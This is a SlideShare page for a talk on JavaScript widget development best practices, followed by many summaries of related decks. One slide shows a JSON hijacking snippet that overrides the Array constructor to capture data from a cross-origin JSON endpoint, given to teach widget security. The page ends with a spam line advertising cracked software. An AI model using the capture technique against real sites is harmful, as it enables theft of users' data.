External JavaScript Widget Development Best Practices (updated) (v.1.1)
Download as pptx, pdf6 likes4,342 views
The document discusses best practices for developing JavaScript widgets. It covers challenges like versioning, cross-domain restrictions, cookies, security, and performance. Versioning can be handled through URL parameters or initializing with a version number. Cross-domain issues can be addressed using techniques like CORS, postMessage, or JSONP. Security requires sanitizing inputs, whitelisting domains, and handling risks like XSS and CSRF. Performance involves minimizing payload size and network requests.
1 of 28
Downloaded 52 times
![Widget Security (lesser known)
JSON Hijacking
<script>
var captured = [];
function Array() {
for (var i = 0; i < 3; i++) {
this[i] setter = function(val)
{ captured.push(val); };
}
}
</script>
<script src="http://api.example.com/products.json"></script>](https://image.slidesharecdn.com/javascriptwidgetdevelopmentjstanbul2012-120730012626-phpapp01/85/External-JavaScript-Widget-Development-Best-Practices-updated-v-1-1-22-320.jpg)
Ad
Recommended
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik This document discusses best practices for developing JavaScript widgets. It begins by introducing widgets and their types, then discusses challenges like versioning, cross-domain restrictions, shared environments, and security. It provides recommendations for handling these challenges, such as using cache-revalidating scripts for versioning, cross-domain messaging for communication, and sanitization for security. The document concludes by addressing widget performance, emphasizing minimizing payload size, lazy loading, and yielding to avoid blocking.
Conquering AngularJS Limitations
Conquering AngularJS LimitationsValeri Karpov The document discusses strategies for addressing common AngularJS challenges including SEO, responsive design, and integration testing. It recommends using Prerender.io to generate static HTML for search engines to index Single Page Apps. For responsive design, it suggests using reactive directives that emit events in response to screen size changes rather than having directives know about screen size. Finally, it outlines an approach to integration testing AngularJS directives in isolation using Karma and bootstrapping directives for testing DOM logic.
Lessons in Open Source from the MongooseJS ODM
Lessons in Open Source from the MongooseJS ODMValeri Karpov Valeri Karpov discusses his experience with the Mongoose ODM project for Node.js. He got involved after discovering Mongoose helped reduce his code, and later became the main maintainer. He provides an overview of how Mongoose works through schema validation, syntactic sugar for updates, and hooks/middleware. Recent additions include query middleware and promises support. Lessons learned include being responsive to issues and maintaining a clear vision for an open source project.
MongoDB MEAN Stack Webinar October 7, 2015
MongoDB MEAN Stack Webinar October 7, 2015Valeri Karpov The document discusses building a REST API using Node.js and MongoDB. It covers creating schemas for products, categories, and users using Mongoose. It also discusses building out routes for retrieving, adding, and removing data. Testing the API is covered using Mocha and Superagent to make HTTP requests. Schema design principles like embedding related data are also summarized.
Blazor - The New Silverlight?
Blazor - The New Silverlight?Christian Nagel The document discusses Blazor, a framework allowing .NET code execution in modern browsers without plug-ins, leveraging WebAssembly for better performance and portability. It includes an overview of WebAssembly's design goals, Blazor's capabilities such as dependency injection and Razor components, and compares it with Silverlight. The document also emphasizes the potential for various applications and encourages experimentation with the Blazor preview in Visual Studio 2019.
Testing your Single Page Application
Testing your Single Page ApplicationWekoslav Stefanovski The document presents an overview of a talk focused on testing single-page applications (SPAs), emphasizing the history, current relevance, and design for quality in software development. It discusses the evolution of JavaScript and the necessity of testing due to the complex nature of software with various types of tests and frameworks highlighted. The talk includes a demo using Knockout.js, showcasing practical testing methods with tools like QUnit and PhantomJS.
Introduction to PhantomJS
Introduction to PhantomJSErol Selitektay PhantomJS is a headless WebKit scriptable with JavaScript API that allows testing and automating web pages without requiring a browser to be displayed. It renders pages and outputs the results, supporting many test frameworks. PhantomJS can capture screenshots, monitor network performance, and automate tasks like testing, page scraping, and generating images/charts from websites. It works across platforms and provides a fast, native implementation of web standards without emulation.
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...Dakiry The document discusses the ProtractorJS framework for automated testing of Angular applications, highlighting its ease of use compared to Java and its growing community support. It covers features like integration with various test runners, support for multiple browsers, and a focus on asynchronous programming with promises. Additionally, it provides links to examples and resources for further learning about the framework.
Modern iframe programming
Modern iframe programmingbenvinegar This document discusses using iframes for various purposes such as sandboxing code from different domains or versions, asynchronous script loading, and cross-domain communication. It describes how iframes can execute code in a clean JavaScript environment isolated from the parent window. It also explains techniques like postMessage for communication between frames and using iframes with JSONP or document.domain to enable cross-domain requests and property access. The document provides examples of libraries that sandbox code in iframes like Twitter's @anywhere widget and the hiro.js testing framework.
jQuery Chicago 2014 - Next-generation JavaScript Testing
jQuery Chicago 2014 - Next-generation JavaScript TestingVlad Filippov This document discusses next-generation JavaScript testing tools. It introduces The Intern, an open source framework for testing JavaScript code with both unit and functional tests. The Intern supports cross-browser testing, integrates with services like SauceLabs and BrowserStack, and can run tests across continuous integration systems. The presentation provides examples of using The Intern to test different applications and frameworks.
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"Andi Rustandi Djunaedi The document discusses secure coding practices, focusing on web application vulnerabilities highlighted by the OWASP Top 10 list, including SQL injection and session fixation. It emphasizes the importance of addressing both security and performance issues, along with practical exercises to understand and mitigate these vulnerabilities. Additionally, the document includes resources for further exploration and suggests measures to prevent exploitation of these vulnerabilities.
Bringing The Sexy Back To WebWorkers
Bringing The Sexy Back To WebWorkersCorey Clark, Ph.D. The document discusses the use of web workers in building high-performance real-time web applications, emphasizing their ability to execute tasks in parallel while keeping the user interface responsive. It covers various types of web workers, their limitations, and performance considerations, highlighting the importance of effective memory synchronization. The document also includes practical demos, browser support, and lessons learned from development experiences.
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...Corey Clark, Ph.D. The document discusses the technical aspects of building a web development platform using HTML5, WebGL, and WebSockets, focusing on multi-threading and parallel processing capabilities through web workers. It details performance comparisons of various browsers and implementations alongside server-side considerations for handling multiple concurrent users efficiently. Additionally, it presents the Jahova OS architecture and its modules for managing resources, events, and sessions.
Selenium testing
Selenium testingJason Myers This document discusses UI functional testing with Selenium and Python. It provides an overview of Selenium IDE, WebDriver, Server and Grid. It describes how Selenium IDE is a Firefox plugin that allows recording and playback of tests. WebDriver allows controlling browsers programmatically and supports many languages. The document also demonstrates different locator strategies like ID, XPath, name, CSS and link text that can be used with WebDriver. It shows examples of interacting with page elements by sending keys, clicking, and selecting options. Finally, it mentions that WebDriver Server allows parallel test execution across browsers using technologies like Azure.
Testing Single Page Webapp
Testing Single Page WebappAkshay Mathur This document provides an overview and agenda for a session on testing single-page web applications. It introduces the concepts of traditional and modern web applications, and how they differ in terms of page construction and the challenges they pose for testing. It then discusses technologies like Node.js, headless browsers, CasperJS and Splinter that help enable testing of dynamic DOM in single-page apps from outside the browser or without opening the browser. The agenda involves demonstrating how to test a UI using these tools by invoking tests from the Python console or command line.
In-browser storage and me
In-browser storage and meJason Casden I do not have any additional information to provide. Please let me know if you have any other questions!
Webdriver.io
Webdriver.io LinkMe Srl This document discusses the webdriver.io framework for automated browser testing. The author needed a framework for blackbox testing of a web interface like a user would. Webdriver.io provides JavaScript bindings for Selenium that allow writing tests in a synchronous style using the browser object. Tests can run across multiple browsers and platforms. The framework is easy to set up and use, supports plugins, and allows custom commands. Under the hood, it communicates with Selenium using the WebDriver protocol to automate actual browsers.
Avoiding Common Pitfalls in Ember.js
Avoiding Common Pitfalls in Ember.jsAlex Speller 1. Common routing pitfalls in Ember.js include incorrectly using resources vs routes, not understanding the validation vs setup phase of routing, and assuming route nesting matches template nesting.
2. Other common mistakes include forgetting to use the property helper with computed properties, not passing actions correctly to components, and having invalid JSON that silently fails in Ember Data.
3. Debugging challenges include swallowed promise errors and not using the debugger, console.log, or Ember Inspector tools effectively. Understanding function scope, native array methods, and action bubbling in CoffeeScript can also trip developers up.
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationMike Wilcox AJAX allows asynchronous communication between the client and server without refreshing the page. It uses techniques like XMLHttpRequest, iFrames, and remote scripting to update parts of the DOM without reloading the entire page. The same origin policy prevents scripts from one origin accessing properties from another for security. Popular browsers that support AJAX include Internet Explorer, Firefox, and WebKit which powers Safari and Chrome.
Testing Mobile JavaScript (Fall 2010
Testing Mobile JavaScript (Fall 2010jeresig John Resig has been researching the mobile space and wants to ensure jQuery works well across popular mobile platforms and browsers. He discusses the challenges of defining the relevant platforms and browser versions due to a lack of public statistics. His testing strategy involves drawing a line to determine what to support, buying devices, downloading simulators, and using TestSwarm for automated testing. He recommends simulators and devices for different levels of support.
Blazor v1.1
Blazor v1.1Juan Luis Guerrero Minero This document provides an overview of Web Assembly (WASM) and Blazor. It discusses how WASM allows code to run in browsers without plugins and is optimized for speed and size. Examples of WASM usage include games, video editors, and CAD tools. Blazor is introduced as a framework that runs .NET code in browsers using WASM. It follows an MVVM pattern and enables two-way data binding. The document compares Blazor to other technologies and provides resources for learning more.
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016Matt Raible The document discusses microservices architecture, emphasizing the importance of starting with a modular monolith before transitioning to microservices as complexity grows. It highlights the use of Spring Boot and JHipster for application development, detailing the installation process and features generated by JHipster. Additionally, it covers API security protocols, JWT creation and validation, and mentions future updates in microservices technology.
jQuery Keynote - Fall 2010
jQuery Keynote - Fall 2010jeresig The document summarizes the state of the jQuery project in Fall 2010. It discusses how project funds have been and will be spent, including on server infrastructure, developer time, design work, and conferences. Governance rules and a contribution path for new developers are being formalized. The copyright for a book is being transferred to the project. A CLA process and store selling t-shirts have launched. jQuery 1.4.3 and related plugins improved performance, modularity, CSS, and the development process. Finally, jQuery Mobile is a new framework to build sites for all mobile browsers and platforms.
Re-Introduction to Third-party Scripting
Re-Introduction to Third-party Scriptingbenvinegar This document discusses third-party scripts and some of the challenges of developing them. It covers topics like asynchronous script loading, avoiding global collisions, sandboxing code, and debugging cross-domain issues. New techniques like CORS, JSONP, and postMessage are also presented as ways to make cross-domain requests from third-party scripts.
Next generation frontend tooling
Next generation frontend toolingpksjce The document discusses modern JavaScript tooling and trends. It outlines problems with existing tools like slow performance and poor source mapping. Emerging tools like Vitejs and Snowpack are faster and support ES modules and features like instant loading and HMR. The document argues the JavaScript ecosystem is entering a third age driven by ESM, Rust/Go for tooling, and emerging technologies like Deno. Resources are provided to learn more about Vitejs, Snowpack, and trends in frontend tooling.
Build the mobile web you want
Build the mobile web you wantk88hudson The document discusses building mobile web applications using new technologies like service workers and transpilation/polyfilling to overcome limitations of the web. It advocates "hacking" by testing new features early, building new abstractions, and pushing boundaries. It describes a prototype for a "hybrid" mobile app that uses an Android activity and webview, with a communication layer between JavaScript and Java for features like routing, state management, and device integration like the camera. The goal is to build the mobile web in a way that addresses issues like offline usage and performance, while paving the way for future improvements.
JSFoo-2017 Takeaways
JSFoo-2017 TakeawaysMir Ali The document discusses key topics presented by the Hotstar web team at JSFoo 2017, including the significance of web components for creating reusable HTML elements, the importance of security in web applications, and the capabilities of React Native for cross-platform development. It highlights various presentations on web technologies such as WebVR, the Jest testing framework, and the implementation of best practices for application performance. Additionally, it mentions the need for efficient bundling and loading strategies to optimize web applications.
Automated Testing with Cucumber, PhantomJS and Selenium
Automated Testing with Cucumber, PhantomJS and SeleniumDev9Com The document discusses Behavior Driven Development (BDD) using Cucumber, Selenium, and PhantomJS. Cucumber uses a natural language syntax called Gherkin to write automated acceptance tests. Selenium is used to automate interactions with a web browser, while PhantomJS allows running those tests headlessly on a CI server without requiring a graphical browser. The example project demonstrates how Cucumber features written by PMs/BAs can be linked to Selenium step definitions to test a web application.
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik The document outlines best practices for JavaScript widget development, covering topics such as types of widgets, versioning, and security measures. It emphasizes the need for performance optimization, cross-domain compatibility, and careful handling of cookies and security vulnerabilities. Key recommendations include minimizing initial payloads, asynchronous initialization, and thorough sanitization of input to prevent security issues.
orcreatehappyusers
orcreatehappyuserstutorialsruby This document discusses the JavaScript library Prototype and how it can be used to build dynamic user interfaces with Ajax techniques. It provides an overview of Prototype's features for simplifying Ajax calls, enhancing DOM manipulation, adding visual effects, and debugging JavaScript across browsers. The document promotes Prototype as a way to focus on applications rather than browser bugs and contains links to documentation, extensions, and debugging tools to support Prototype development.
More Related Content
What's hot (20)
Modern iframe programming
Modern iframe programmingbenvinegar This document discusses using iframes for various purposes such as sandboxing code from different domains or versions, asynchronous script loading, and cross-domain communication. It describes how iframes can execute code in a clean JavaScript environment isolated from the parent window. It also explains techniques like postMessage for communication between frames and using iframes with JSONP or document.domain to enable cross-domain requests and property access. The document provides examples of libraries that sandbox code in iframes like Twitter's @anywhere widget and the hiro.js testing framework.
jQuery Chicago 2014 - Next-generation JavaScript Testing
jQuery Chicago 2014 - Next-generation JavaScript TestingVlad Filippov This document discusses next-generation JavaScript testing tools. It introduces The Intern, an open source framework for testing JavaScript code with both unit and functional tests. The Intern supports cross-browser testing, integrates with services like SauceLabs and BrowserStack, and can run tests across continuous integration systems. The presentation provides examples of using The Intern to test different applications and frameworks.
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"Andi Rustandi Djunaedi The document discusses secure coding practices, focusing on web application vulnerabilities highlighted by the OWASP Top 10 list, including SQL injection and session fixation. It emphasizes the importance of addressing both security and performance issues, along with practical exercises to understand and mitigate these vulnerabilities. Additionally, the document includes resources for further exploration and suggests measures to prevent exploitation of these vulnerabilities.
Bringing The Sexy Back To WebWorkers
Bringing The Sexy Back To WebWorkersCorey Clark, Ph.D. The document discusses the use of web workers in building high-performance real-time web applications, emphasizing their ability to execute tasks in parallel while keeping the user interface responsive. It covers various types of web workers, their limitations, and performance considerations, highlighting the importance of effective memory synchronization. The document also includes practical demos, browser support, and lessons learned from development experiences.
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...Corey Clark, Ph.D. The document discusses the technical aspects of building a web development platform using HTML5, WebGL, and WebSockets, focusing on multi-threading and parallel processing capabilities through web workers. It details performance comparisons of various browsers and implementations alongside server-side considerations for handling multiple concurrent users efficiently. Additionally, it presents the Jahova OS architecture and its modules for managing resources, events, and sessions.
Selenium testing
Selenium testingJason Myers This document discusses UI functional testing with Selenium and Python. It provides an overview of Selenium IDE, WebDriver, Server and Grid. It describes how Selenium IDE is a Firefox plugin that allows recording and playback of tests. WebDriver allows controlling browsers programmatically and supports many languages. The document also demonstrates different locator strategies like ID, XPath, name, CSS and link text that can be used with WebDriver. It shows examples of interacting with page elements by sending keys, clicking, and selecting options. Finally, it mentions that WebDriver Server allows parallel test execution across browsers using technologies like Azure.
Testing Single Page Webapp
Testing Single Page WebappAkshay Mathur This document provides an overview and agenda for a session on testing single-page web applications. It introduces the concepts of traditional and modern web applications, and how they differ in terms of page construction and the challenges they pose for testing. It then discusses technologies like Node.js, headless browsers, CasperJS and Splinter that help enable testing of dynamic DOM in single-page apps from outside the browser or without opening the browser. The agenda involves demonstrating how to test a UI using these tools by invoking tests from the Python console or command line.
In-browser storage and me
In-browser storage and meJason Casden I do not have any additional information to provide. Please let me know if you have any other questions!
Webdriver.io
Webdriver.io LinkMe Srl This document discusses the webdriver.io framework for automated browser testing. The author needed a framework for blackbox testing of a web interface like a user would. Webdriver.io provides JavaScript bindings for Selenium that allow writing tests in a synchronous style using the browser object. Tests can run across multiple browsers and platforms. The framework is easy to set up and use, supports plugins, and allows custom commands. Under the hood, it communicates with Selenium using the WebDriver protocol to automate actual browsers.
Avoiding Common Pitfalls in Ember.js
Avoiding Common Pitfalls in Ember.jsAlex Speller 1. Common routing pitfalls in Ember.js include incorrectly using resources vs routes, not understanding the validation vs setup phase of routing, and assuming route nesting matches template nesting.
2. Other common mistakes include forgetting to use the property helper with computed properties, not passing actions correctly to components, and having invalid JSON that silently fails in Ember Data.
3. Debugging challenges include swallowed promise errors and not using the debugger, console.log, or Ember Inspector tools effectively. Understanding function scope, native array methods, and action bubbling in CoffeeScript can also trip developers up.
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationMike Wilcox AJAX allows asynchronous communication between the client and server without refreshing the page. It uses techniques like XMLHttpRequest, iFrames, and remote scripting to update parts of the DOM without reloading the entire page. The same origin policy prevents scripts from one origin accessing properties from another for security. Popular browsers that support AJAX include Internet Explorer, Firefox, and WebKit which powers Safari and Chrome.
Testing Mobile JavaScript (Fall 2010
Testing Mobile JavaScript (Fall 2010jeresig John Resig has been researching the mobile space and wants to ensure jQuery works well across popular mobile platforms and browsers. He discusses the challenges of defining the relevant platforms and browser versions due to a lack of public statistics. His testing strategy involves drawing a line to determine what to support, buying devices, downloading simulators, and using TestSwarm for automated testing. He recommends simulators and devices for different levels of support.
Blazor v1.1
Blazor v1.1Juan Luis Guerrero Minero This document provides an overview of Web Assembly (WASM) and Blazor. It discusses how WASM allows code to run in browsers without plugins and is optimized for speed and size. Examples of WASM usage include games, video editors, and CAD tools. Blazor is introduced as a framework that runs .NET code in browsers using WASM. It follows an MVVM pattern and enables two-way data binding. The document compares Blazor to other technologies and provides resources for learning more.
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016Matt Raible The document discusses microservices architecture, emphasizing the importance of starting with a modular monolith before transitioning to microservices as complexity grows. It highlights the use of Spring Boot and JHipster for application development, detailing the installation process and features generated by JHipster. Additionally, it covers API security protocols, JWT creation and validation, and mentions future updates in microservices technology.
jQuery Keynote - Fall 2010
jQuery Keynote - Fall 2010jeresig The document summarizes the state of the jQuery project in Fall 2010. It discusses how project funds have been and will be spent, including on server infrastructure, developer time, design work, and conferences. Governance rules and a contribution path for new developers are being formalized. The copyright for a book is being transferred to the project. A CLA process and store selling t-shirts have launched. jQuery 1.4.3 and related plugins improved performance, modularity, CSS, and the development process. Finally, jQuery Mobile is a new framework to build sites for all mobile browsers and platforms.
Re-Introduction to Third-party Scripting
Re-Introduction to Third-party Scriptingbenvinegar This document discusses third-party scripts and some of the challenges of developing them. It covers topics like asynchronous script loading, avoiding global collisions, sandboxing code, and debugging cross-domain issues. New techniques like CORS, JSONP, and postMessage are also presented as ways to make cross-domain requests from third-party scripts.
Next generation frontend tooling
Next generation frontend toolingpksjce The document discusses modern JavaScript tooling and trends. It outlines problems with existing tools like slow performance and poor source mapping. Emerging tools like Vitejs and Snowpack are faster and support ES modules and features like instant loading and HMR. The document argues the JavaScript ecosystem is entering a third age driven by ESM, Rust/Go for tooling, and emerging technologies like Deno. Resources are provided to learn more about Vitejs, Snowpack, and trends in frontend tooling.
Build the mobile web you want
Build the mobile web you wantk88hudson The document discusses building mobile web applications using new technologies like service workers and transpilation/polyfilling to overcome limitations of the web. It advocates "hacking" by testing new features early, building new abstractions, and pushing boundaries. It describes a prototype for a "hybrid" mobile app that uses an Android activity and webview, with a communication layer between JavaScript and Java for features like routing, state management, and device integration like the camera. The goal is to build the mobile web in a way that addresses issues like offline usage and performance, while paving the way for future improvements.
JSFoo-2017 Takeaways
JSFoo-2017 TakeawaysMir Ali The document discusses key topics presented by the Hotstar web team at JSFoo 2017, including the significance of web components for creating reusable HTML elements, the importance of security in web applications, and the capabilities of React Native for cross-platform development. It highlights various presentations on web technologies such as WebVR, the Jest testing framework, and the implementation of best practices for application performance. Additionally, it mentions the need for efficient bundling and loading strategies to optimize web applications.
Automated Testing with Cucumber, PhantomJS and Selenium
Automated Testing with Cucumber, PhantomJS and SeleniumDev9Com The document discusses Behavior Driven Development (BDD) using Cucumber, Selenium, and PhantomJS. Cucumber uses a natural language syntax called Gherkin to write automated acceptance tests. Selenium is used to automate interactions with a web browser, while PhantomJS allows running those tests headlessly on a CI server without requiring a graphical browser. The example project demonstrates how Cucumber features written by PMs/BAs can be linked to Selenium step definitions to test a web application.
Similar to External JavaScript Widget Development Best Practices (updated) (v.1.1) (20)
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik The document outlines best practices for JavaScript widget development, covering topics such as types of widgets, versioning, and security measures. It emphasizes the need for performance optimization, cross-domain compatibility, and careful handling of cookies and security vulnerabilities. Key recommendations include minimizing initial payloads, asynchronous initialization, and thorough sanitization of input to prevent security issues.
orcreatehappyusers
orcreatehappyuserstutorialsruby This document discusses the JavaScript library Prototype and how it can be used to build dynamic user interfaces with Ajax techniques. It provides an overview of Prototype's features for simplifying Ajax calls, enhancing DOM manipulation, adding visual effects, and debugging JavaScript across browsers. The document promotes Prototype as a way to focus on applications rather than browser bugs and contains links to documentation, extensions, and debugging tools to support Prototype development.
orcreatehappyusers
orcreatehappyuserstutorialsruby This document discusses the JavaScript library Prototype and how it can be used to build dynamic user interfaces with Ajax techniques. It provides an overview of Prototype's features for simplifying Ajax calls, enhancing DOM manipulation, adding visual effects, and debugging JavaScript across browsers. The document promotes Prototype as a way to focus on applications rather than browser bugs and contains links to documentation, extensions, and debugging tools to support Prototype development.
Android lessons you won't learn in school
Android lessons you won't learn in schoolMichael Galpin This document discusses several lessons about Android development that are not typically covered in school. It covers architectural changes in Android over time, security best practices, techniques for logging user activity and crash reports, strategies for building hybrid mobile-web applications, considerations for creating mobile SDKs, and approaches for testing Android apps on multiple device configurations.
Usersnap and the javascript magic behind the scenes - ViennaJS
Usersnap and the javascript magic behind the scenes - ViennaJSUsersnap The document discusses Usersnap, a tool designed to improve communication in web project development by allowing seamless annotation and feedback from all parties involved. It highlights the challenges faced when integrating JavaScript snippets into third-party websites, such as CSS overwrites and cross-origin issues, and suggests solutions like iframe sandboxing and proper error handling. Ultimately, it emphasizes the importance of security and reliability when dealing with external code.
How to Contribute to Apache Usergrid
How to Contribute to Apache UsergridDavid M. Johnson The document provides a comprehensive guide on contributing to Apache Usergrid, detailing the various roles and workflows for contributors. It includes instructions for getting the code, building and running the stack, and provides insights into the internal architecture and testing procedures. Additionally, it outlines the roadmap for future releases and steps for submitting contributions.
Do you lose sleep at night?
Do you lose sleep at night?Nathan Van Gheem The document is a presentation on common web security issues and vulnerabilities, highlighting the importance of security for website owners and developers. It details the top five security risks, including SQL injection, Denial of Service, Cross-Site Scripting, Cross-Site Request Forgery, and access control, along with prevention solutions for each. Additionally, the document discusses caching, load balancing, database selection, performance, monitoring, and the role of add-ons in maintaining web security.
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz Krzysztof Kotowicz presented several HTML5 tricks that could be abused by attackers:
- Filejacking allows reading files from a user's system using the directory upload feature in Chrome. Sensitive files were exposed from some users.
- AppCache poisoning can be used in a man-in-the-middle attack to persist malicious payloads by tampering with a site's cache manifest file.
- Silent file upload uses cross-origin resource sharing to upload fake files without user interaction, potentially enabling CSRF attacks.
He warned that IFRAME sandboxing could facilitate clickjacking, and that drag-and-drop techniques risk exposing sensitive content across domains unless sites use X-
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin Krzysztof Kotowicz presented several ways that HTML5 and user interaction could be abused by attackers:
- Filejacking allows uploading files from a user's system without consent by tricking them into selecting a folder. Sensitive files were taken from actual victims.
- AppCache poisoning can be used to persist malicious payloads on a user's system by tampering with application manifest files during a man-in-the-middle attack.
- Silent file upload constructs arbitrary files in JavaScript and uploads them to a victim site using cross-origin resource sharing if CSRF is possible. This was demonstrated against a real website.
- IFRAME sandboxing and drag-and-drop
Hacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton David Stockton's presentation at OpenWest 2015 focuses on understanding web vulnerabilities and how to exploit and secure them. It covers common exploits like SQL injection, XSS, and command injection, detailing methods to identify and mitigate these risks. The session aims to educate participants on ethical hacking practices using a hackable virtual machine called 'Gouda Times'.
A 20 minute introduction to AngularJS for XPage developers
A 20 minute introduction to AngularJS for XPage developersMark Leusink This document introduces AngularJS as a front-end web application framework that enhances client-side programming, contrasting its architecture with server-side XPages. It discusses the development process, tools, and provides setup instructions for demos using Domino data services. The document highlights the significance of AngularJS in modern web development and mobile hybrid applications.
Hacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton The document is a presentation by David Stockton on common web vulnerabilities and how to secure against them, focusing on SQL injection, XSS, and command injection. It provides a hands-on approach using a virtual machine with a hackable site called 'Gouda Times' to practice exploiting vulnerabilities and encourages ethical hacking for educational purposes. Key prevention methods are outlined, including input validation, error handling, and implementing CSRF tokens.
Tech io spa_angularjs_20130814_v0.9.5
Tech io spa_angularjs_20130814_v0.9.5Ganesh Kondal This document provides an overview of single page applications (SPAs) and AngularJS. It discusses why SPAs are useful, how they work, and key aspects of AngularJS like data binding, directives, routing, and dependency injection. Code samples are presented to demonstrate basic concepts like data binding, controllers, filters, and building an e-commerce application with routing and services. Future sessions are proposed to cover integration with Node.js backends, testing with Karma, and custom directives.
Streams API (Web Engines Hackfest 2015)
Streams API (Web Engines Hackfest 2015)Igalia The document discusses streams API, which enables asynchronous I/O processing by reading and writing data chunks. It can pipe data between streams and supports automatic transformations. The spec defines ReadableStream, WritableStream, and TransformStream interfaces. It is useful for tasks like loading video segments or sending messages over websockets. The implementation in browsers uses JavaScript builtins tied to WebIDL to define the API in a maintainable and performant way while avoiding memory issues, though it requires care around security.
Jinx - Malware 2.0
Jinx - Malware 2.0Itzik Kotler The document discusses a type of JavaScript-based malware called 'jinx', which exploits browser vulnerabilities to manipulate web content and access local files. It details techniques such as utilizing hidden windows and AJAX to bypass security restrictions and describes the architecture and scripting involved in creating the malware. The presentation concludes with a reflection on future developments, such as using AJAX for self-directed functionality and potential social engineering tactics.
Angular SEO
Angular SEO Tiang Cheng This document discusses SEO challenges for JavaScript applications and solutions used at ratemyagent.com.au. It covers using hashbangs and escaped fragments to allow search engines to crawl single-page apps. Prerendering techniques are explained like snapshot, on-the-fly, and server-side rendering. Their middleware uses PreRender_MVC and attempted various prerendering services. Coding tips provided include understanding Google's AJAX crawling specification, URL types for SEO, setting canonical URLs, and tools like Google Webmaster Tools.
Masterin Large Scale Java Script Applications
Masterin Large Scale Java Script ApplicationsFabian Jakobs The document discusses strategies for mastering large-scale JavaScript applications, highlighting the challenges of managing complexity and performance while utilizing frameworks like qooxdoo. Key topics include the importance of good abstractions, tooling for development, and techniques for optimizing startup time and widget creation. Additionally, it emphasizes the need for internationalization and clean code practices in web development.
20120306 dublin js
20120306 dublin jsRichard Rodger The document discusses how JavaScript can be used from the user interface on mobile and web apps through to the server and database using techniques like Node.js. It provides examples of how Node.js allows for high performance server-side JavaScript and how MongoDB can be used as a database. The document outlines lessons learned around challenges of multi-platform development and benefits of outsourcing databases and other services.
Selenium Tips & Tricks - StarWest 2015
Selenium Tips & Tricks - StarWest 2015Andrew Krug This document provides an overview of Selenium testing tools and techniques. It discusses headless testing using Xvfb and PhantomJS. It also covers visual testing with Applitools, using proxy servers like BrowserMob for status codes and performance testing, and emulating mobile devices. Additional topics include growl notifications, file handling, A/B testing, and resources for learning more about Selenium.
Доклад Михаила Егорова на PHDays
Доклад Михаила Егорова на PHDaysru_Parallels The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.
Ad
Recently uploaded (20)
The Future of Product Management in AI ERA.pdf
The Future of Product Management in AI ERA.pdfAlyona Owens Hi, I’m Aly Owens, I have a special pleasure to stand here as over a decade ago I graduated from CityU as an international student with an MBA program. I enjoyed the diversity of the school, ability to work and study, the network that came with being here, and of course the price tag for students here has always been more affordable than most around.
Since then I have worked for major corporations like T-Mobile and Microsoft and many more, and I have founded a startup. I've also been teaching product management to ensure my students save time and money to get to the same level as me faster avoiding popular mistakes. Today as I’ve transitioned to teaching and focusing on the startup, I hear everybody being concerned about Ai stealing their jobs… We’ll talk about it shortly.
But before that, I want to take you back to 1997. One of my favorite movies is “Fifth Element”. It wowed me with futuristic predictions when I was a kid and I’m impressed by the number of these predictions that have already come true. Self-driving cars, video calls and smart TV, personalized ads and identity scanning. Sci-fi movies and books gave us many ideas and some are being implemented as we speak. But we often get ahead of ourselves:
Flying cars,Colonized planets, Human-like AI: not yet, Time travel, Mind-machine neural interfaces for everyone: Only in experimental stages (e.g. Neuralink).
Cyberpunk dystopias: Some vibes (neon signs + inequality + surveillance), but not total dystopia (thankfully).
On the bright side, we predict that the working hours should drop as Ai becomes our helper and there shouldn’t be a need to work 8 hours/day. Nobody knows for sure but we can require that from legislation. Instead of waiting to see what the government and billionaires come up with, I say we should design our own future.
So, we as humans, when we don’t know something - fear takes over. The same thing happened during the industrial revolution. In the Industrial Era, machines didn’t steal jobs—they transformed them but people were scared about their jobs. The AI era is making similar changes except it feels like robots will take the center stage instead of a human. First off, even when it comes to the hottest space in the military - drones, Ai does a fraction of work. AI algorithms enable real-time decision-making, obstacle avoidance, and mission optimization making drones far more autonomous and capable than traditional remote-controlled aircraft. Key technologies include computer vision for object detection, GPS-enhanced navigation, and neural networks for learning and adaptation. But guess what? There are only 2 companies right now that utilize Ai in drones to make autonomous decisions - Skydio and DJI.
Coordinated Disclosure for ML - What's Different and What's the Same.pdf
Coordinated Disclosure for ML - What's Different and What's the Same.pdfPriyanka Aash Coordinated Disclosure for ML - What's Different and What's the Same
CapCut Pro Crack For PC Latest Version {Fully Unlocked} 2025
